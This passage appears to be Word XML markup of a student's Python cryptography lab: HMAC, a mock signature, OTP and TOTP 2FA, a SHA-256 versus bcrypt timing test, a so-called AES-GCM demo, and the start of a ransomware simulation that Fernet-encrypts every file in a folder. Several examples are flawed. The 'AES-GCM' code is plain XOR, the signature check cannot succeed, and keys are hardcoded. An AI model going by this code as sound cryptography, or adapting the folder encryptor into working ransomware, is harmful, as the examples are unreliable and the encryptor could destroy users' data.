    <w:p w14:paraId="60D8F98D" w14:textId="74B71947" w:rsidR="00CF7CE3" w:rsidRPr="00CF7CE3" w:rsidRDefault="00CF7CE3" w:rsidP="00CF7CE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00CF7CE3" w:rsidRPr="00CF7CE3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CF7CE3">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            print(f"{name}: {digest}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA7B99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before="76"/>
        <w:ind w:right="537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HMAC-based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HMAC module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C82EFC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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BF8117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import hmac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC83FD3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import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53454DC7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</w:p>
    <w:p w14:paraId="24C5BA1D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SECRET_KEY = b'supersecretkey'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5081B6D0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</w:p>
    <w:p w14:paraId="1B4F1FF5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def generate_hmac(message):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4589BE0A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return hmac.new(SECRET_KEY, message.encode(), hashlib.sha256).hexdigest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504C5CC6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</w:p>
    <w:p w14:paraId="1C8FFB49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def verify_hmac(message, received_hmac):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA7F3D0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expected = generate_hmac(message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784159A9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return hmac.compare_digest(expected, received_hmac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19A632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</w:p>
    <w:p w14:paraId="3909CB78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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CF8572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message = "ImportantMessage"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F51DC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generated = generate_hmac(message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3450E5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print("Generated HMAC:", generated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6110314A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453FC464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# Simulate verifying HMAC (in a real system, 'received_hmac' comes from the sender)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5E085F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if verify_hmac(message, generated):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4473E866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print("HMAC verification successful!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA75A43" w14:textId="77777777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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E006A9" w14:textId="083E8194" w:rsidR="00CF7CE3" w:rsidRPr="00CF7CE3" w:rsidRDefault="00CF7CE3" w:rsidP="00CF7CE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="76"/>
        <w:ind w:left="1080" w:right="537" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF7CE3">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("HMAC verification failed!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04949392" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="000A3EA0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426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signatures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PyCryptodome </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC8364" w14:textId="77777777" w:rsidR="000A3EA0" w:rsidRDefault="000A3EA0" w:rsidP="000A3EA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="426" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F4E868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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0384BF58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import hmac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AD331E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import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8EB675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import secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA4E97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</w:p>
    <w:p w14:paraId="3BA5D783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def generate_keys():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6449A291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private_key = secrets.token_bytes(32)  # 32-byte random key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE76AE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public_key = hashlib.sha256(private_key).digest()  # Derived "public" key (simplified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124BE188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print(f"Generated private key (hex): {private_key.hex()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0417DCAD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print(f"Derived public key (hex): {public_key.hex()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22798A27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return private_key, public_key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB5C194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</w:p>
    <w:p w14:paraId="76D00236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def sign_message(message, private_key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F1BB58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print(f"Signing message: '{message}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ACDDD5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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    h = hmac.new(private_key, message.encode(), hashlib.sha256)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC71D6E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signature = h.digest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C0D1C3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print(f"Generated signature (hex): {signature.hex()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C06A6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return signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D7DBDB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</w:p>
    <w:p w14:paraId="281A3A53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def verify_signature(message, signature, public_key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113C4CDC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print(f"Verifying message: '{message}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515D4B12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expected_hmac = hmac.new(public_key, message.encode(), hashlib.sha256).digest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0315BF65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is_valid = hmac.compare_digest(signature, expected_hmac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C2E99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print(f"Signature valid: {is_valid}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F74AA89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return is_valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BEF30F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</w:p>
    <w:p w14:paraId="7D7F3D25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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1559A536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private_key, public_key = generate_keys()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B23CA55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message = "This is a secret message."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715DDD2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signature = sign_message(message, private_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEB8AF2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333E2E98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if verify_signature(message, signature, public_key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738E5E66" w14:textId="77777777" w:rsidR="000A3EA0" w:rsidRP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    print("Verification result: Signature is valid!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C85F73" w14:textId="77777777" w:rsidR="000A3EA0" w:rsidRDefault="000A3EA0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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ECF4FE" w14:textId="77777777" w:rsidR="008D5F68" w:rsidRPr="000A3EA0" w:rsidRDefault="008D5F68" w:rsidP="000A3EA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="426"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41601EAD" w14:textId="1D0283F0" w:rsidR="000A3EA0" w:rsidRPr="000A3EA0" w:rsidRDefault="000A3EA0" w:rsidP="000A3EA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="426" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3EA0">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("Verification result: Signature is invalid!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE0C99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line="242" w:lineRule="auto"/>
        <w:ind w:right="1156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challenge-response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one-time passwords (OTP) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:spacing w:val="-24"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B366C4A" w14:textId="77777777" w:rsid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 w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="176FA95E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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C12B07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secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9C8801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</w:p>
    <w:p w14:paraId="421A6DBF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generate_challenge():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF11AFF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# Generate a random 8-character hexadecimal string as challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA55D9C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secrets.token_hex(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090513A0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</w:p>
    <w:p w14:paraId="22CE8E75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generate_otp(challenge, secret_key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693BF438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# In a real system, OTP generation would combine the challenge and secret key in a secure way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1500C1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# Here, we simply generate a random OTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCAC1FC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secrets.token_hex(3)  # 6 hex characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59809A2A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</w:p>
    <w:p w14:paraId="35A7313F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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A191E9E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secret_key = "SuperSecretKey"  # This would be shared between client and server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B88058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challenge = generate_challenge()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21208DDB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print("Challenge:", challenge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EED4E2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7D69E97E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otp = generate_otp(challenge, secret_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632F8FAA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print("Generated OTP:", otp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A76791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5B3CF459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# Simulate client response (for simplicity, use the same OTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C76EFE5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client_response = otp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DDFDCF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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if client_response == otp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245EAAF8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print("Authentication Successful!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED1AB7B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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6280E964" w14:textId="2CAC8126" w:rsid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 w:firstLine="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print("Authentication Failed!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAB39B1" w14:textId="77777777" w:rsidR="008D5F68" w:rsidRPr="008D5F68" w:rsidRDefault="008D5F68" w:rsidP="008D5F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="1156" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11662B24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line="281" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20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two-factor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authentication (2FA)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rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pyotp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1791CA97" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155E552B" w14:textId="77777777" w:rsidR="008D5F68" w:rsidRDefault="008D5F68">
      <w:pPr>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="631A80CE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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACC5AEC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pyotp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC8BB6B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</w:p>
    <w:p w14:paraId="1BCACDBE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generate_secret():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E43ABA5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# Generate a random Base32 secret key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151CA692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secret = pyotp.random_base32()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072EE969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print("Secret Key:", secret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD27BA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secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA9E874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</w:p>
    <w:p w14:paraId="2D479AD6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generate_otp(secret):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0BBE6A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totp = pyotp.TOTP(secret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7094A499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otp = totp.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B7559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print("Generated OTP:", otp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4851A33C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otp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF00EB5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</w:p>
    <w:p w14:paraId="5A7134C2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verify_otp(secret, user_input):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4401CBD2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totp = pyotp.TOTP(secret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F50CDC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if totp.verify(user_input):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFB1808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print("OTP Verified Successfully!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD5C904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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D7DB0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print("Invalid OTP! Verification Failed.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B9D9B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</w:p>
    <w:p w14:paraId="367A26E4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main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0732BBAB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print("=== Two-Factor Authentication (2FA) Demo ===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4056437F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secret = generate_secret()  # :contentReference[oaicite:10]{index=10}&amp;#8203;:contentReference[oaicite:11]{index=11}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486837B4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otp = generate_otp(secret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612DC2B0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user_otp = input("Enter the OTP: ").strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3392D306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verify_otp(secret, user_otp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B6550A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</w:p>
    <w:p w14:paraId="47E91B87" w14:textId="77777777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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E69095C" w14:textId="54D1DB0A" w:rsidR="008D5F68" w:rsidRPr="008D5F68" w:rsidRDefault="008D5F68" w:rsidP="008D5F68">
      <w:pPr>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="108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main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F15B369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822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SHA-256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bcrypt hashing algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F078438" w14:textId="77777777" w:rsidR="008D5F68" w:rsidRDefault="008D5F68" w:rsidP="008D5F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="822" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12391FBF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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3483ACDE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hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8B894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bcrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D5CD4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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7EFF2A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</w:p>
    <w:p w14:paraId="460FD968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hash_sha256(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69143B0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hashlib.sha256(data.encode('utf-8')).hexdigest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482969F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</w:p>
    <w:p w14:paraId="77D3DEB5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hash_bcrypt(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1613B0C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salt = bcrypt.gensalt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C709E4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bcrypt.hashpw(data.encode('utf-8'), salt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5774CC2E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</w:p>
    <w:p w14:paraId="36C9D80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compare_hashes():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7870694A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data = "supersecretpassword"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B842E4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68F10188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start = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D4BC24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sha256_result = hash_sha256(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C425C9C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sha256_time = time.time() - start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E7BAF8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0CFC8980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start = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3398F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bcrypt_result = hash_bcrypt(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09800EAE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bcrypt_time = time.time() - start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BFDF9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2BF2389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print("SHA-256 Hash:", sha256_result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0670E4C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print("SHA-256 Time: {:.6f} seconds".format(sha256_time))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340642F2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print("bcrypt Hash:", bcrypt_result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4319C6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print("bcrypt Time: {:.6f} seconds".format(bcrypt_time))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C40B54A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print("\nNote: SHA-256 is faster, but bcrypt is more secure against brute-force attacks.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5977DB88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662DCFCA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82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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617C02D0" w14:textId="06895AFE" w:rsidR="008D5F68" w:rsidRPr="008D5F68" w:rsidRDefault="008D5F68" w:rsidP="008D5F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="822" w:firstLine="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compare_hashes()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E909199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942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authenticate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AES-GCM (Authenticated Encryption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350F95D6" w14:textId="77777777" w:rsidR="008D5F68" w:rsidRDefault="008D5F68" w:rsidP="008D5F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="942" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFDEFD5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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E6B7D6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base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02277785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secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F20D693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hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D4942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</w:p>
    <w:p w14:paraId="1B44895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generate_key():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F559B09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key = secrets.token_bytes(32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0229663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print(f"Generated key (hex): {key.hex()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0943EDF5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key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0C818A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</w:p>
    <w:p w14:paraId="10D231B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encrypt_message(key, message):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC9F29C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print(f"Encrypting message: '{message}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D4AE9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key_hash = hashlib.sha256(key).digest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDFB505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ciphertext = bytes(a ^ b for a, b in zip(message.encode(), key_hash * (len(message) // len(key_hash) + 1)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30305BA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print(f"Ciphertext (hex): {ciphertext.hex()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A380F06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ciphertext, key_hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A5235B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</w:p>
    <w:p w14:paraId="514A5384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decrypt_message(key, ciphertext):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B72D9A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print(f"Decrypting ciphertext (hex): {ciphertext.hex()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7014A85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key_hash = hashlib.sha256(key).digest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A24A8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plaintext = bytes(a ^ b for a, b in zip(ciphertext, key_hash * (len(ciphertext) // </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5F68">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>len(key_hash) + 1)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD3D56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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2216F332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decoded = plaintext.decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C8EAB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print(f"Decrypted message: '{decoded}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A173A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return decoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D9F57F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except UnicodeDecodeError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ABD27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print("Decryption failed: Invalid data!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B6FEF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return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715F555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</w:p>
    <w:p w14:paraId="715ACDB0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main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4391D159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key = generate_key()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C191946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message = "This is a confidential message."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB7961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ciphertext, nonce = encrypt_message(key, message)  # Using nonce as key_hash for simplicity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599C6E1B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6138E2F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decrypted = decrypt_message(key, ciphertext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E68F44D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print("\nResults:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B71197E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print(f"Original: {message}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEBE9B7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print(f"Ciphertext (Base64): {base64.b64encode(ciphertext).decode()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4171DD88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print(f"Decrypted: {decrypted or 'Failed'}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484C9242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</w:p>
    <w:p w14:paraId="3C93BE60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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C30D5F" w14:textId="0AFB3EE5" w:rsidR="008D5F68" w:rsidRDefault="008D5F68" w:rsidP="008D5F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="942" w:firstLine="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main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DEF122" w14:textId="77777777" w:rsidR="008D5F68" w:rsidRPr="008D5F68" w:rsidRDefault="008D5F68" w:rsidP="008D5F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="942" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2E54E0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before="1"/>
        <w:ind w:right="79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ransomware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encrypting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folder and then decrypting them with a key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A27F48" w14:textId="77777777" w:rsidR="008D5F68" w:rsidRDefault="008D5F68" w:rsidP="008D5F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1080" w:right="790" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52896013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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3789AC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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA9845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from cryptography.fernet import Fernet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E46FD5C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</w:p>
    <w:p w14:paraId="747280A5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generate_key():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BE2C0E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key = Fernet.generate_key()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AD0781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with open("encryption.key", "wb") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A05A15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f.write(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250BCA18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key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5054D0BC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</w:p>
    <w:p w14:paraId="60D8AA37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load_key():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7306EBB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return open("encryption.key", "rb").read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8E200D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</w:p>
    <w:p w14:paraId="467078B3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encrypt_files(folder, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D34D1B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cipher = Fernet(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C41FC18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for filename in os.listdir(folder):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A710527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filepath = os.path.join(folder, filename)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF7A3D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if os.path.isfile(filepath):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54616487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with open(filepath, "rb") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375A7E50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    data = f.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC92CA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encrypted = cipher.encrypt(data)</w:t>
